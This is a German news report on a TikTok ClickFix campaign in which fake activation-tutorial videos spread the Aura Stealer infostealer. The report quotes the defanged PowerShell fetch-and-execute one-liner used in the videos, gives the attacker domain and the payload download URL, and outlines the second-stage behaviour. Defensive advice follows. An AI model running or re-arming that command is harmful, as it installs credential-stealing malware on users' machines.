Cyberkriminelle verbreiten informationsstehlende Malware über eine Kampagne auf TikTok und verwenden dabei Videos, die fälschlicherweise behaupten, kostenlose Aktivierungsanleitungen für beliebte Software zu sein. Der am 19. Oktober 2025 identifizierte laufende Vorgang nutzt eine Social-Engineering-Methode, um Benutzer dazu zu verleiten, ihre eigenen Computer zu infizieren.
ISC-Mitarbeiter Xavier Mertens berichtete über die Kampagne und wies auf Ähnlichkeiten mit einer von Trend Micro im Mai beobachteten Operation hin. Die TikTok-Videos geben vor, Anweisungen zum Aktivieren legitimer Software wie Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro und Discord Nitro zu bieten. Die Kampagne bewirbt auch erfundene Dienste, darunter „Netflix Premium“ und „Spotify Premium“, um ein breiteres Publikum anzulocken.
Die Angriffstechnik ist als ClickFix-Angriff bekannt und beinhaltet die Bereitstellung scheinbar hilfreicher Anweisungen, die Benutzer dazu verleiten, bösartige Befehle auszuführen. Die Videos zeigen einen kurzen, einzeiligen PowerShell-Befehl und weisen die Zuschauer an, ihn mit Administratorrechten auszuführen. Ein Beispielbefehl ist iex (irm slmgr[.]win/photoshop). Der spezifische Programmname in der URL, z. B. „Photoshop“, wird geändert, um ihn an die Software anzupassen, die im Video nachgeahmt wird.
Wenn ein Benutzer diesen Befehl ausführt, stellt PowerShell eine Verbindung zur Remote-Site slmgr[.]win her. Diese Aktion ruft ein zweites PowerShell-Skript ab und führt es aus, das dann zwei ausführbare Dateien von Cloudflare-Seiten herunterlädt. Die erste Datei, heruntergeladen von https://file-epq[.]pages[.]dev/updater.exe, ist eine Variante der Aura Stealer-Malware. Aura Stealer wurde entwickelt, um gespeicherte Anmeldeinformationen von Webbrowsern, Authentifizierungscookies, Kryptowährungs-Wallets und Anmeldedaten von anderen Anwendungen zu sammeln. Diese gestohlenen Informationen werden dann an die Angreifer hochgeladen und gewähren ihnen Zugriff auf die Konten des Opfers.
Eine zweite Nutzlast mit dem Namen source.exe wird ebenfalls heruntergeladen. Diese ausführbare Datei wird zum Selbstkompilieren von Code mithilfe des integrierten Visual C#-Compilers (csc.exe) des .NET Frameworks verwendet. Der kompilierte Code wird anschließend direkt in den Speicher eingefügt und gestartet. Der konkrete Zweck dieser zweiten Nutzlast ist noch nicht geklärt.
Benutzer, die die Anweisungen in diesen Videos befolgt haben, sollten davon ausgehen, dass alle ihre Zugangsdaten kompromittiert sind, und es wird ihnen empfohlen, die Passwörter für alle von ihnen genutzten Websites und Online-Dienste sofort zurückzusetzen.
ClickFix-Angriffe sind im vergangenen Jahr deutlich häufiger geworden. Sie werden verwendet, um verschiedene Malware-Stämme in Kampagnen im Zusammenhang mit Ransomware und Kryptowährungsdiebstahl zu verbreiten. Als allgemeine Sicherheitsmaßnahme sollten Benutzer niemals Text von einer Website kopieren und ihn in einem Betriebssystemdialogfeld ausführen, einschließlich der Adressleiste des Datei-Explorers, der Eingabeaufforderung, PowerShell, dem macOS-Terminal oder Linux-Shells.
